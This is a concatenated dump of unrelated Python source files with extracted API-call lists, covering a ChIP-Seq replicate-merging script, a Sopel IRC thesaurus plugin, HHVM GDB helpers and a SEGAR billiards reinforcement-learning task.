'TopoI_Topo_Seq_3': {'Ara' : pwd + "Replics_1_2_3_Thresholds\TopoI_Topo_Seq_3_Ara_TCSs_called_thr_15.BroadPeak", 'No_Ara' : pwd + "Replics_1_2_3_Thresholds\TopoI_Topo_Seq_3_no_Ara_TCSs_called_thr_15.BroadPeak"}}
#Configuration of the output for the GCSs data in replicas.
Replicas_path_out="C:\\Users\sutor\OneDrive\ThinkPad_working\Sutor\Science\TopoI-ChIP-Seq\TopA_ChIP-Seq\EcTopoI_G116S_M320V_Topo-Seq\TCS_motifs\\Replicas_1_2_3_Tresholds_trusted_TCSs\\"
if not os.path.exists(Replicas_path_out):
os.makedirs(Replicas_path_out)
Set_name="Thr_15"
All_conditions_name="TopoI_Topo_Seq_123_TCSs_merged"
#Configuration of the output for GCSs trusted.
Out_path=Replicas_path_out + "TopoI_Topo_Seq_123_TCSs_called_thr_15.BroadPeak"
#Outpath for Venn diagrams.
plot_outpath=Replicas_path_out
#######
#Parsing raw GCSs coordinates, returns dictionary - GCSs_coordinate:N3E.
#######
def read_GCSs_file(GCSs_file_path):
GCSs_dict={}
GCSs_in=open(GCSs_file_path, 'r')
for line in GCSs_in:
line=line.rstrip().split('\t')
if line[0] not in ['GCSs_coordinate']:
GCSs_dict[int(line[1])]=float(line[6])
GCSs_in.close()
return GCSs_dict
#######
#Filter controls.
#######
def filter_controls(replicas_path_dict):
#Merges a range of replicates
TCSs_replicas_dict={}
for set_name, set_pair in replicas_path_dict.items(): #Iterates replicas
#Read files with raw GCSs
Raw_TCSs_dict_Ara=read_GCSs_file(set_pair['Ara'])
Raw_TCSs_dict_no_Ara=read_GCSs_file(set_pair['No_Ara'])
Raw_TCSs_dict_Ara_filtered={}
for TCS_coordinate, TCS_signal in Raw_TCSs_dict_Ara.items():
if TCS_coordinate not in Raw_TCSs_dict_no_Ara:
Raw_TCSs_dict_Ara_filtered[TCS_coordinate]=TCS_signal
TCSs_replicas_dict[set_name]=Raw_TCSs_dict_Ara_filtered
return TCSs_replicas_dict
#######
#Combines replicates into one GCSs table.
#######
def combine_replicates(replicas_path_dict, path_out, name):
#Filter controls.
TCSs_replicas_dict=filter_controls(replicas_path_dict)
#Merges a range of replicates
GCSs_replicas_dict={}
names_ar=[]
for key, Raw_GCSs_dict in TCSs_replicas_dict.items(): #Iterates replicas
names_ar.append(key)
for k, v in Raw_GCSs_dict.items(): #Iterates raw GCSs
#Table filling process initiation
if len(names_ar)==1:
GCSs_replicas_dict[k]=[v]
#Table filling process continuing (the table already contains at least one GCSs set)
else:
#If GCSs is already in the table
if k in GCSs_replicas_dict:
GCSs_replicas_dict[k].append(v)
#If this is the first occurrence of the element in a NON empty table.
else:
add_el=[]
for j in range(len(names_ar)-1):
add_el.append(0)
add_el.append(v)
GCSs_replicas_dict[k]=add_el
#If table body line contains less elements than header does, hence add zero.
for k, v in GCSs_replicas_dict.items():
if len(v)<len(names_ar):
GCSs_replicas_dict[k].append(0)
#Sorting the list of dictionary keys.
GCSs_replicas_dict_sorted=collections.OrderedDict(sorted(GCSs_replicas_dict.items()))
#Writes merged GCSs data
fileout=open(f'{path_out}{name}_TCSs_replicates.txt', 'w')
#TCSs_out.write(f'{Genome_ID}\t{TCSs_list_F[i][0]}\t{TCSs_list_F[i][0]+1}\tTCS_{i}_F\t10\t.\t{TCSs_list_F[i][1]}\t-1\t-1\n')
#Header
fileout.write('TCSs_coordinate\t')
for i in names_ar:
fileout.write(str(i) + '_N3E\t')
fileout.write('\n')
#Body of the table
for k, v in GCSs_replicas_dict_sorted.items():
fileout.write(str(k) + '\t')
for i in GCSs_replicas_dict_sorted[k]:
fileout.write(str(i) + '\t')
fileout.write('\n')
fileout.close()
return GCSs_replicas_dict
#Prepares GCSs table for all conditions
#combine_replicates(path_to_replicas, Replicas_path_out, All_conditions_name)
#######
#Returns only trusted GCSs - observed at least 2 times within 3 biological replicates.
#Data organization: 1. coordinate of GCSs, 2.-4. N3E values for biological replicates 1-3
#######
def trusted(ar):
av_height=0
ind=0
for i in range(len(ar)):
if ar[i]>0:
ind=ind+1
av_height=av_height+ar[i]
if ind>1:
return av_height/ind
else:
return "No signal"
def trusted_GCSs_calling(GCSs_dictionary):
ar=[]
for k, v in GCSs_dictionary.items():
if trusted(v)!="No signal":
ar.append([k, trusted(v)])
return ar
def replicas_comb_trust_wrapper(replicas_dict, path_out, name):
print('Now working with: ' + str(name))
cur_GCSs_dict=combine_replicates(replicas_dict, path_out, name)
cur_GCSs_trusted=trusted_GCSs_calling(cur_GCSs_dict)
print('Number of trusted TCSs for ' + str(name) + ' : ' + str(len(cur_GCSs_trusted)))
return cur_GCSs_trusted
TCSs_trusted=replicas_comb_trust_wrapper(path_to_replicas, Replicas_path_out, All_conditions_name)
#Antibs_GCSs_sets=[Cfx, RifCfx, Micro, Oxo]
#######
#GCSs shared between pairs of antibiotics - Cfx, Micro and Oxo and between Cfx and RifCfx.
#######
def pairs_construction(ar1, ar2):
double=[]
for i in range(len(ar1)):
for j in range(len(ar2)):
if ar1[i][0]==ar2[j][0]:
double.append([ar1[i][0], ar1[i][1], ar2[j][1]]) #GCSs coordinate, N3E_1, N3E_2
return double
#Cfx_RifCfx_shared_GCSs=pairs_construction(Cfx, RifCfx)
#print('Number of GCSs shared between Cfx and RifCfx: ' + str(len(Cfx_RifCfx_shared_GCSs)) + '\n')
#
#Cfx_Micro_shared_GCSs=pairs_construction(Cfx, Micro)
#Cfx_Oxo_shared_GCSs=pairs_construction(Cfx, Oxo)
#Micro_Oxo_shared_GCSs=pairs_construction(Micro, Oxo)
#
#print('Number of GCSs shared between Cfx and Micro: ' + str(len(Cfx_Micro_shared_GCSs)))
#print('Number of GCSs shared between Cfx and Oxo: ' + str(len(Cfx_Oxo_shared_GCSs)))
#print('Number of GCSs shared between Micro and Oxo: ' + str(len(Micro_Oxo_shared_GCSs)) + '\n')
#
#Antibs_GCSs_sets_pair_shared=[Cfx_Micro_shared_GCSs, Cfx_Oxo_shared_GCSs, Micro_Oxo_shared_GCSs]
#######
#GCSs shared between 3 antibiotics
#######
def triple_construction(ar12, ar3):
triple=[]
for i in range(len(ar12)):
for j in range(len(ar3)):
if ar12[i][0]==ar3[j][0]:
triple.append([ar12[i][0], ar12[i][1], ar12[i][2], ar3[j][1]]) #GCSs coordinate, N3E_1, N3E_2, N3E_3
return triple
#Cfx_Micro_Oxo_shared_GCSs=triple_construction(Cfx_Micro_shared_GCSs, Oxo)
#print('Number of GCSs shared between Cfx, Micro and Oxo: ' + str(len(Cfx_Micro_Oxo_shared_GCSs)) +'\n')
#######
#Parses replicas, overlaps lists of GCSs, output data for Venn diagram construction.
#######
def replicates_parsing_to_list_and_overlapping(replicas_dict, name):
#Parsing
GCSs_dict={}
for k, v in replicas_dict.items(): #Iterate replicas.
GCSs_dict[k]=[]
for c, h in read_GCSs_file(v).items(): #Iterate GCSs.
GCSs_dict[k].append([c, h])
#Overlapping
one_two=pairs_construction(GCSs_dict[name+str(1)], GCSs_dict[name+str(2)])
one_three=pairs_construction(GCSs_dict[name+str(1)], GCSs_dict[name+str(3)])
two_three=pairs_construction(GCSs_dict[name+str(2)], GCSs_dict[name+str(3)])
one_two_three=triple_construction(one_two, GCSs_dict[name+str(3)])
#Venn input description (for 3 sets): one, two, three, one_two, one_three, two_three, one_two_three
venn_input=[len(GCSs_dict[name+str(1)])-len(one_two)-len(one_three)+len(one_two_three),
len(GCSs_dict[name+str(2)])-len(one_two)-len(two_three)+len(one_two_three),
len(one_two)-len(one_two_three),
len(GCSs_dict[name+str(3)])-len(one_three)-len(two_three)+len(one_two_three),
len(one_three)-len(one_two_three), len(two_three)-len(one_two_three),
len(one_two_three)]
return venn_input
#######
#Venn diagram represents GCSs sets overlapping.
#description2: one, two, one_two
#description3: one, two, one_two, three, one_three, two_three, one_two_three
#######
#venn_data_2=[len(Cfx)-len(Cfx_RifCfx_shared_GCSs), len(RifCfx)-len(Cfx_RifCfx_shared_GCSs), len(Cfx_RifCfx_shared_GCSs)]
#venn_data_3=[len(Cfx)-len(Cfx_Micro_shared_GCSs)-len(Cfx_Oxo_shared_GCSs)+len(Cfx_Micro_Oxo_shared_GCSs),
# len(Micro)-len(Cfx_Micro_shared_GCSs)-len(Micro_Oxo_shared_GCSs)+len(Cfx_Micro_Oxo_shared_GCSs),
# len(Cfx_Micro_shared_GCSs)-len(Cfx_Micro_Oxo_shared_GCSs),
# len(Oxo)-len(Cfx_Oxo_shared_GCSs)-len(Micro_Oxo_shared_GCSs)+len(Cfx_Micro_Oxo_shared_GCSs),
# len(Cfx_Oxo_shared_GCSs)-len(Cfx_Micro_Oxo_shared_GCSs),
# len(Micro_Oxo_shared_GCSs)-len(Cfx_Micro_Oxo_shared_GCSs),
# len(Cfx_Micro_Oxo_shared_GCSs)]
#venn2(subsets = (venn_data_2), set_labels = ("Ciprofloxacin", "Rifampicin Ciprofloxacin"))
#plt.savefig(plot_outpath+'Cfx_RifCfx_venn.png', dpi=320)
#plt.close()
#
#print("Cfx Micro Oxo subsets volumes: " + str(venn_data_3))
#venn3(subsets = (venn_data_3), set_labels = ('Ciprofloxacin', 'Microcin B17', 'Oxolinic acid'))
#plt.savefig(plot_outpath+'Cfx_Micro_Oxo_venn.png', dpi=320)
#plt.close()
#
#venn3(subsets = (replicates_parsing_to_list_and_overlapping(path_to_cfx_replicas, 'Cfx_')), set_labels = ('Cfx_1', 'Cfx_2', 'Cfx_3'))
#plt.savefig(plot_outpath+'Cfx_replicas_venn.png', dpi=320)
#plt.close()
#
#venn3(subsets = (replicates_parsing_to_list_and_overlapping(path_to_rifcfx_replicas, 'RifCfx_')), set_labels = ('RifCfx_1', 'RifCfx_2', 'RifCfx_3'))
#plt.savefig(plot_outpath+'RifCfx_replicas_venn.png', dpi=320)
#plt.close()
#
#venn3(subsets = (replicates_parsing_to_list_and_overlapping(path_to_microcin_replicas, 'Micro_')), set_labels = ('Micro_1', 'Micro_2', 'Micro_3'))
#plt.savefig(plot_outpath+'Micro_replicas_venn.png', dpi=320)
#plt.close()
#
#venn3(subsets = (replicates_parsing_to_list_and_overlapping(path_to_oxo_replicas, 'Oxo_')), set_labels = ('Oxo_1', 'Oxo_2', 'Oxo_3'))
#plt.savefig(plot_outpath+'Oxo_replicas_venn.png', dpi=320)
#plt.close()
#######
#GCSs sets average N3E estimation.
#######
def average_height(ar):
av_he=0
for i in range(len(ar)):
peak_he=np.mean(ar[i][1:])
av_he=av_he+peak_he
return av_he/len(ar)
#print('Cfx average GCSs N3E: ' + str(average_height(Cfx)))
#print('Micro average GCSs N3E: ' + str(average_height(Micro)))
#print('Oxo average GCSs N3E: ' + str(average_height(Oxo)))
#print('Cfx and Micro average GCSs N3E: ' + str(average_height(Cfx_Micro_shared_GCSs)))
#print('Cfx and Oxo average GCSs N3E: ' + str(average_height(Cfx_Oxo_shared_GCSs)))
#print('Micro and Oxo average GCSs N3E: ' + str(average_height(Micro_Oxo_shared_GCSs)))
#print('Cfx, Micro and Oxo average GCSs N3E: ' + str(average_height(Cfx_Micro_Oxo_shared_GCSs)) + '\n')
#######
#Write down files with GCSs lists - trusted or shared.
#######
#All_GCSs_sets={Cfx_path: Antibs_GCSs_sets[0],
# RifCfx_path: Antibs_GCSs_sets[1],
# Micro_path: Antibs_GCSs_sets[2],
# Oxo_path: Antibs_GCSs_sets[3],
# Cfx_Micro_path: Antibs_GCSs_sets_pair_shared[0],
# Cfx_Oxo_path: Antibs_GCSs_sets_pair_shared[1],
# Micro_Oxo_path: Antibs_GCSs_sets_pair_shared[2],
# Cfx_Micro_Oxo_path: Cfx_Micro_Oxo_shared_GCSs}
def write_GCSs_file(dictionary):
for k, v in dictionary.items(): #Iterates lists to be written
v.sort(key=lambda tup: tup[0]) #Sorting lists by the zero elements of the sublists they consist of
fileout=open(k, 'w')
fileout.write('GCSs_coordinate\tN3E\n')
for i in range(len(v)):
fileout.write(str(v[i][0]) + '\t' + str(np.mean(v[i][1:])) + '\n')
fileout.close()
return
#write_GCSs_file(All_GCSs_sets)
def write_Cfx_RifCfx_shared_GCSs(ar, path):
fileout=open(path, 'w')
fileout.write('GCSs_coordinate\tCfx_N3E\tRifCfx_N3E\n')
ar.sort(key=lambda tup: tup[0])
for i in range(len(ar)):
fileout.write(str(ar[i][0]) + '\t' + str(ar[i][1]) + '\t' + str(ar[i][2]) + '\n')
fileout.close()
return
#write_Cfx_RifCfx_shared_GCSs(Cfx_RifCfx_shared_GCSs, Cfx_RifCfx_shared_GCSs_path)
#
#print('Script ended its work successfully!')
|
[
"numpy.mean",
"os.path.exists",
"os.makedirs"
] |
[((1698, 1731), 'os.path.exists', 'os.path.exists', (['Replicas_path_out'], {}), '(Replicas_path_out)\n', (1712, 1731), False, 'import os\n'), ((1737, 1767), 'os.makedirs', 'os.makedirs', (['Replicas_path_out'], {}), '(Replicas_path_out)\n', (1748, 1767), False, 'import os\n'), ((11670, 11688), 'numpy.mean', 'np.mean', (['ar[i][1:]'], {}), '(ar[i][1:])\n', (11677, 11688), True, 'import numpy as np\n'), ((13184, 13201), 'numpy.mean', 'np.mean', (['v[i][1:]'], {}), '(v[i][1:])\n', (13191, 13201), True, 'import numpy as np\n')]
|
"""
Original author: xnaas (2022)
License: The Unlicense (public domain)
"""
import requests
from sopel import plugin, formatting
from sopel.config.types import StaticSection, ValidatedAttribute
class ThesaurusSection(StaticSection):
api_key = ValidatedAttribute("api_key", str)
def setup(bot):
bot.config.define_section("thesaurus", ThesaurusSection)
def configure(config):
config.define_section("thesaurus", ThesaurusSection)
config.thesaurus.configure_setting("api_key", "dictionaryapi.com api key")
@plugin.command("syn", "synonym")
@plugin.output_prefix("[synonym] ")
def synonyms(bot, trigger):
word = formatting.plain(trigger.group(3))
url = f"https://www.dictionaryapi.com/api/v3/references/thesaurus/json/{word}"
key = {"key": bot.config.thesaurus.api_key}
try:
synonyms = requests.get(url, params=key).json()[0]["meta"]["syns"][0]
bot.say(", ".join(synonyms), max_messages=2)
except IndexError:
bot.reply("No results.")
@plugin.command("ant", "antonym")
@plugin.output_prefix("[antonym] ")
def antonyms(bot, trigger):
word = formatting.plain(trigger.group(3))
url = f"https://www.dictionaryapi.com/api/v3/references/thesaurus/json/{word}"
key = {"key": bot.config.thesaurus.api_key}
try:
antonyms = requests.get(url, params=key).json()[0]["meta"]["ants"][0]
bot.say(", ".join(antonyms), max_messages=2)
except IndexError:
bot.reply("No results.")
|
[
"sopel.plugin.command",
"sopel.plugin.output_prefix",
"sopel.config.types.ValidatedAttribute",
"requests.get"
] |
[((528, 560), 'sopel.plugin.command', 'plugin.command', (['"""syn"""', '"""synonym"""'], {}), "('syn', 'synonym')\n", (542, 560), False, 'from sopel import plugin, formatting\n'), ((562, 596), 'sopel.plugin.output_prefix', 'plugin.output_prefix', (['"""[synonym] """'], {}), "('[synonym] ')\n", (582, 596), False, 'from sopel import plugin, formatting\n'), ((1003, 1035), 'sopel.plugin.command', 'plugin.command', (['"""ant"""', '"""antonym"""'], {}), "('ant', 'antonym')\n", (1017, 1035), False, 'from sopel import plugin, formatting\n'), ((1037, 1071), 'sopel.plugin.output_prefix', 'plugin.output_prefix', (['"""[antonym] """'], {}), "('[antonym] ')\n", (1057, 1071), False, 'from sopel import plugin, formatting\n'), ((250, 284), 'sopel.config.types.ValidatedAttribute', 'ValidatedAttribute', (['"""api_key"""', 'str'], {}), "('api_key', str)\n", (268, 284), False, 'from sopel.config.types import StaticSection, ValidatedAttribute\n'), ((832, 861), 'requests.get', 'requests.get', (['url'], {'params': 'key'}), '(url, params=key)\n', (844, 861), False, 'import requests\n'), ((1307, 1336), 'requests.get', 'requests.get', (['url'], {'params': 'key'}), '(url, params=key)\n', (1319, 1336), False, 'import requests\n')]
|
import os
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = os.path.expanduser('~/.key.json')
|
[
"os.path.expanduser"
] |
[((57, 90), 'os.path.expanduser', 'os.path.expanduser', (['"""~/.key.json"""'], {}), "('~/.key.json')\n", (75, 90), False, 'import os\n')]
|
"""
Assorted utilities for HHVM GDB bindings.
"""
# @lint-avoid-python-3-compatibility-imports
import collections
import functools
import gdb
#------------------------------------------------------------------------------
# Memoization.
def memoized(func):
"""Simple memoization decorator that ignores **kwargs."""
cache = {}
@functools.wraps(func)
def memoizer(*args):
if not isinstance(args, collections.Hashable):
return func(*args)
if args not in cache:
cache[args] = func(*args)
return cache[args]
return memoizer
#------------------------------------------------------------------------------
# General-purpose helpers.
def parse_argv(args):
return [gdb.parse_and_eval(arg) for arg in gdb.string_to_argv(args)]
def vstr(value):
"""Stringify a value without pretty-printing."""
for pp in gdb.pretty_printers:
try:
pp.saved = pp.enabled
except AttributeError:
pp.saved = True
pp.enabled = False
ret = unicode(value)
for pp in gdb.pretty_printers:
pp.enabled = pp.saved
return ret
#------------------------------------------------------------------------------
# Caching lookups.
@memoized
def T(name):
return gdb.lookup_type(name)
@memoized
def V(name):
return gdb.lookup_symbol(name)[0].value()
@memoized
def K(name):
return gdb.lookup_global_symbol(name).value()
|
[
"gdb.lookup_type",
"gdb.lookup_symbol",
"functools.wraps",
"gdb.string_to_argv",
"gdb.parse_and_eval",
"gdb.lookup_global_symbol"
] |
[((345, 366), 'functools.wraps', 'functools.wraps', (['func'], {}), '(func)\n', (360, 366), False, 'import functools\n'), ((1284, 1305), 'gdb.lookup_type', 'gdb.lookup_type', (['name'], {}), '(name)\n', (1299, 1305), False, 'import gdb\n'), ((737, 760), 'gdb.parse_and_eval', 'gdb.parse_and_eval', (['arg'], {}), '(arg)\n', (755, 760), False, 'import gdb\n'), ((772, 796), 'gdb.string_to_argv', 'gdb.string_to_argv', (['args'], {}), '(args)\n', (790, 796), False, 'import gdb\n'), ((1411, 1441), 'gdb.lookup_global_symbol', 'gdb.lookup_global_symbol', (['name'], {}), '(name)\n', (1435, 1441), False, 'import gdb\n'), ((1341, 1364), 'gdb.lookup_symbol', 'gdb.lookup_symbol', (['name'], {}), '(name)\n', (1358, 1364), False, 'import gdb\n')]
|
__copyright__ = "Copyright (c) Microsoft Corporation and Mila - Quebec AI Institute"
__license__ = "MIT"
"""Billiards game
"""
__all__ = ("billiards_default_config", "Billiards", "BilliardsInitialization")
import math
from typing import Optional
import numpy as np
from segar.mdps.initializations import ArenaInitialization
from segar.mdps.rewards import dead_reward_fn, l2_distance_reward_fn
from segar.mdps.tasks import Task
from segar.rendering.rgb_rendering import register_color
from segar.factors import (
Label,
Mass,
Charge,
Shape,
Text,
Circle,
GaussianNoise,
Size,
Position,
ID,
Done,
Alive,
Visible,
Velocity,
)
from segar.rules import Prior
from segar.things import Ball, Hole, Entity, Object
from segar.sim.location_priors import RandomBottomLocation
_DEFAULT_CUEBALL_MASS = 1.0
_DEFAULT_CUEBALL_CHARGE = 1.0
_DEFAULT_BALL_MASS = 1.0
_DEFAULT_BALL_SIZE = 0.2
_DEFAULT_BALL_CHARGE = 1.0
_DEFAULT_HOLE_SIZE = 0.3
_DEFAULT_DEAD_REWARD = -100.0
_HOLE_DISTANCE_THRESH = 1e-4
_MAX_BALL_AT_GOAL_VEL = None
_ACTION_RANGE = (-100, 100)
def billiard_ball_positions(
start: list[float, float], r: float = _DEFAULT_BALL_SIZE / 2 + 1e-3, n: int = 10
) -> list[list[float, float]]:
x, y = start
sq2r = math.sqrt(2.0) * r
positions = [start]
positions += [[x - sq2r, y + sq2r], [x + sq2r, y + sq2r]]
positions += [
[x - 2 * sq2r, y + 2 * sq2r],
[x, y + 2 * sq2r],
[x + 2 * sq2r, y + 2 * sq2r],
]
positions += [
[x - 3 * sq2r, y + 3 * sq2r],
[x - sq2r, y + 3 * sq2r],
[x + sq2r, y + 3 * sq2r],
[x + 3 * sq2r, y + 3 * sq2r],
]
positions = positions[:n]
return positions
class CueBall(
Object,
default={
Label: "cueball",
Mass: _DEFAULT_CUEBALL_MASS,
Charge: _DEFAULT_CUEBALL_CHARGE,
Shape: Circle(0.2),
Text: "X",
ID: "cueball",
},
):
pass
billiards_default_config = {
"numbers": [(CueBall, 1)],
"priors": [
Prior(
Size,
GaussianNoise(
_DEFAULT_BALL_SIZE,
0.01,
clip=(_DEFAULT_BALL_SIZE / 2.0, 3 * _DEFAULT_BALL_SIZE / 2.0),
),
entity_type=CueBall,
),
Prior(Size, _DEFAULT_BALL_SIZE, entity_type=Ball),
Prior(Mass, _DEFAULT_BALL_MASS, entity_type=Ball),
Prior(Size, _DEFAULT_HOLE_SIZE, entity_type=Hole),
Prior(Position, RandomBottomLocation(), entity_type=CueBall),
],
}
class BilliardsInitialization(ArenaInitialization):
"""Initialization of billiards derived from arena initialization.
Adds a cueball, holes, and other billiard balls.
"""
def __init__(self, config=None):
self.cueball_id = None
self.ball_ids = []
self.hole_ids = []
super().__init__(config=config)
register_color("cueball", (255, 255, 255))
def sample(self, max_iterations: int = 100) -> list[Entity]:
self.ball_ids.clear()
self.hole_ids.clear()
sampled_things = super().sample(max_iterations=max_iterations)
ball_positions = billiard_ball_positions([0.0, 0.0])
for i, pos in enumerate(ball_positions):
ball = Ball({Position: pos, Text: f"{i + 1}", ID: f"{i + 1}_ball"})
sampled_things.append(ball)
hole_positions = [[-0.9, -0.9], [-0.9, 0.9], [0.9, -0.9], [0.9, 0.9]]
for i, pos in enumerate(hole_positions):
hole = Hole({Position: pos, ID: f"{i}_hole", Size: _DEFAULT_HOLE_SIZE})
sampled_things.append(hole)
has_cueball = False
has_balls = False
has_holes = False
for thing in sampled_things:
if isinstance(thing, CueBall):
has_cueball = True
self.cueball_id = thing[ID]
if isinstance(thing, Ball):
has_balls = True
self.ball_ids.append(thing[ID])
if isinstance(thing, Hole):
has_holes = True
self.hole_ids.append(thing[ID])
if not has_cueball:
raise ValueError("cueball wasn't created.")
if not has_balls:
raise ValueError("balls weren't created.")
if not has_holes:
raise ValueError("holes weren't created.")
return sampled_things
def set_arena(self, init_things: Optional[list[Entity]] = None) -> None:
super().set_arena(init_things)
if self.cueball_id is None:
raise RuntimeError("Cueball was not set in arena.")
if len(self.ball_ids) == 0:
raise RuntimeError("Balls not set in arena.")
if len(self.hole_ids) == 0:
raise RuntimeError("Holes not set in arena.")
class Billiards(Task):
"""Billiards game.
Agent controls the cue ball. Hit the cue ball into billiard balls and
get them into holes. Avoid getting the cue ball into the holes.
"""
def __init__(
self,
initialization: BilliardsInitialization,
action_range: tuple[float, float] = _ACTION_RANGE,
action_shape: tuple[int, ...] = (2,),
dead_reward: float = _DEFAULT_DEAD_REWARD,
hole_distance_threshold: float = _HOLE_DISTANCE_THRESH,
max_ball_at_hole_velocity: float = _MAX_BALL_AT_GOAL_VEL,
):
"""
:param initialization: Initialization object used for initializing
the arena.
:param action_range: Range of actions used by the agent.
:param action_shape: Shape of actions.
:param dead_reward: Reward when cue ball is `dead`.
:param hole_distance_threshold: Distance between billiard ball and hole
under which to stop.
:param max_ball_at_hole_velocity: Max billiard ball velocity under
which to stop.
"""
action_type = np.float16
baseline_action = np.array([0, 0]).astype(action_type)
super().__init__(
action_range=action_range,
action_shape=action_shape,
action_type=action_type,
baseline_action=baseline_action,
initialization=initialization,
)
self._dead_reward = dead_reward
self._hole_distance_threshold = hole_distance_threshold
self._max_ball_at_hole_velocity = max_ball_at_hole_velocity
@property
def cueball_id(self) -> ID:
if not hasattr(self._initialization, "cueball_id"):
raise AttributeError(
"Initialization must define `cueball_id` to " "be compatible with task."
)
cueball_id = self._initialization.cueball_id
if cueball_id is None:
raise ValueError("`cueball_id` is not set yet.")
return cueball_id
@property
def hole_ids(self) -> list[ID]:
if not hasattr(self._initialization, "hole_ids"):
raise AttributeError(
"Initialization must define `hole_ids` to " "be compatible with task."
)
hole_ids = self._initialization.hole_ids
return hole_ids
@property
def ball_ids(self) -> list[ID]:
if not hasattr(self._initialization, "ball_ids"):
raise AttributeError(
"Initialization must define `ball_ids` to " "be compatible with task."
)
ball_ids = self._initialization.ball_ids
return ball_ids
def reward(self, state: dict) -> float:
"""Reward determined by the distance of the billiard balls to the
nearest hold and whether the cue ball is in a hole (dead).
:param state: States
:return: (float) the reward.
"""
ball_state = state["things"][self.cueball_id]
dead_reward = dead_reward_fn(ball_state, self._dead_reward)
# Distance reward is tricky: can't do it directly from states
# because sim owns scaling
distance_reward = 0.0
for ball_id in self.ball_ids:
distance = min([self.sim.l2_distance(ball_id, hole_id) for hole_id in self.hole_ids])
if distance <= self._hole_distance_threshold:
self.sim.change_thing_state(ball_id, Alive, False)
self.sim.change_thing_state(ball_id, Visible, False)
distance_reward += l2_distance_reward_fn(distance)
return dead_reward + distance_reward
def done(self, state: dict) -> bool:
"""Episode is done if the cue ball is dead or if all of the billiard
balls are in the holes.
:param state: The states.
:return: True if the state indicates the environment is done.
"""
ball_state = state["things"][self.cueball_id]
is_finished = ball_state[Done] or not ball_state[Alive]
balls_are_finished = True
for ball_id in self.ball_ids:
ball_state = state["things"][ball_id]
ball_is_finished = ball_state[Done] or not ball_state[Alive]
balls_are_finished = balls_are_finished and ball_is_finished
return is_finished or balls_are_finished
def apply_action(self, force: np.ndarray) -> None:
"""Applies force to the cue ball.
:param force: (np.array) Force to apply
"""
self.sim.add_force(self.cueball_id, force)
def results(self, state: dict) -> dict:
"""Results for monitoring task.
:param state: States
:return: Dictionary of results.
"""
distance = min(
[self.sim.l2_distance(self.cueball_id, hole_id) for hole_id in self.hole_ids]
)
ball_state = state["things"][self.cueball_id]
return dict(
dist_to_goal=distance,
velocity=ball_state[Velocity].norm(),
mass=ball_state[Mass].value,
alive=ball_state[Alive].value,
)
def demo_action(self):
"""Generate an action used for demos
:return: np.array action
"""
return np.random.normal() + np.array((4, 3))
|
[
"math.sqrt",
"segar.things.Hole",
"segar.sim.location_priors.RandomBottomLocation",
"segar.factors.GaussianNoise",
"segar.rules.Prior",
"segar.mdps.rewards.l2_distance_reward_fn",
"numpy.array",
"segar.factors.Circle",
"segar.things.Ball",
"numpy.random.normal",
"segar.mdps.rewards.dead_reward_fn",
"segar.rendering.rgb_rendering.register_color"
] |
[((1278, 1292), 'math.sqrt', 'math.sqrt', (['(2.0)'], {}), '(2.0)\n', (1287, 1292), False, 'import math\n'), ((1893, 1904), 'segar.factors.Circle', 'Circle', (['(0.2)'], {}), '(0.2)\n', (1899, 1904), False, 'from segar.factors import Label, Mass, Charge, Shape, Text, Circle, GaussianNoise, Size, Position, ID, Done, Alive, Visible, Velocity\n'), ((2309, 2358), 'segar.rules.Prior', 'Prior', (['Size', '_DEFAULT_BALL_SIZE'], {'entity_type': 'Ball'}), '(Size, _DEFAULT_BALL_SIZE, entity_type=Ball)\n', (2314, 2358), False, 'from segar.rules import Prior\n'), ((2368, 2417), 'segar.rules.Prior', 'Prior', (['Mass', '_DEFAULT_BALL_MASS'], {'entity_type': 'Ball'}), '(Mass, _DEFAULT_BALL_MASS, entity_type=Ball)\n', (2373, 2417), False, 'from segar.rules import Prior\n'), ((2427, 2476), 'segar.rules.Prior', 'Prior', (['Size', '_DEFAULT_HOLE_SIZE'], {'entity_type': 'Hole'}), '(Size, _DEFAULT_HOLE_SIZE, entity_type=Hole)\n', (2432, 2476), False, 'from segar.rules import Prior\n'), ((2918, 2960), 'segar.rendering.rgb_rendering.register_color', 'register_color', (['"""cueball"""', '(255, 255, 255)'], {}), "('cueball', (255, 255, 255))\n", (2932, 2960), False, 'from segar.rendering.rgb_rendering import register_color\n'), ((7782, 7827), 'segar.mdps.rewards.dead_reward_fn', 'dead_reward_fn', (['ball_state', 'self._dead_reward'], {}), '(ball_state, self._dead_reward)\n', (7796, 7827), False, 'from segar.mdps.rewards import dead_reward_fn, l2_distance_reward_fn\n'), ((2090, 2196), 'segar.factors.GaussianNoise', 'GaussianNoise', (['_DEFAULT_BALL_SIZE', '(0.01)'], {'clip': '(_DEFAULT_BALL_SIZE / 2.0, 3 * _DEFAULT_BALL_SIZE / 2.0)'}), '(_DEFAULT_BALL_SIZE, 0.01, clip=(_DEFAULT_BALL_SIZE / 2.0, 3 *\n _DEFAULT_BALL_SIZE / 2.0))\n', (2103, 2196), False, 'from segar.factors import Label, Mass, Charge, Shape, Text, Circle, GaussianNoise, Size, Position, ID, Done, Alive, Visible, Velocity\n'), ((2502, 2524), 'segar.sim.location_priors.RandomBottomLocation', 'RandomBottomLocation', ([], {}), '()\n', (2522, 2524), False, 'from segar.sim.location_priors import RandomBottomLocation\n'), ((3289, 3349), 'segar.things.Ball', 'Ball', (["{Position: pos, Text: f'{i + 1}', ID: f'{i + 1}_ball'}"], {}), "({Position: pos, Text: f'{i + 1}', ID: f'{i + 1}_ball'})\n", (3293, 3349), False, 'from segar.things import Ball, Hole, Entity, Object\n'), ((3537, 3601), 'segar.things.Hole', 'Hole', (["{Position: pos, ID: f'{i}_hole', Size: _DEFAULT_HOLE_SIZE}"], {}), "({Position: pos, ID: f'{i}_hole', Size: _DEFAULT_HOLE_SIZE})\n", (3541, 3601), False, 'from segar.things import Ball, Hole, Entity, Object\n'), ((8325, 8356), 'segar.mdps.rewards.l2_distance_reward_fn', 'l2_distance_reward_fn', (['distance'], {}), '(distance)\n', (8346, 8356), False, 'from segar.mdps.rewards import dead_reward_fn, l2_distance_reward_fn\n'), ((9998, 10016), 'numpy.random.normal', 'np.random.normal', ([], {}), '()\n', (10014, 10016), True, 'import numpy as np\n'), ((10019, 10035), 'numpy.array', 'np.array', (['(4, 3)'], {}), '((4, 3))\n', (10027, 10035), True, 'import numpy as np\n'), ((5943, 5959), 'numpy.array', 'np.array', (['[0, 0]'], {}), '([0, 0])\n', (5951, 5959), True, 'import numpy as np\n')]
|
import os
import sqlite3
from datetime import datetime
abs_path = os.getcwd()
split = os.path.split(abs_path)
workflow_db_path = os.path.join(
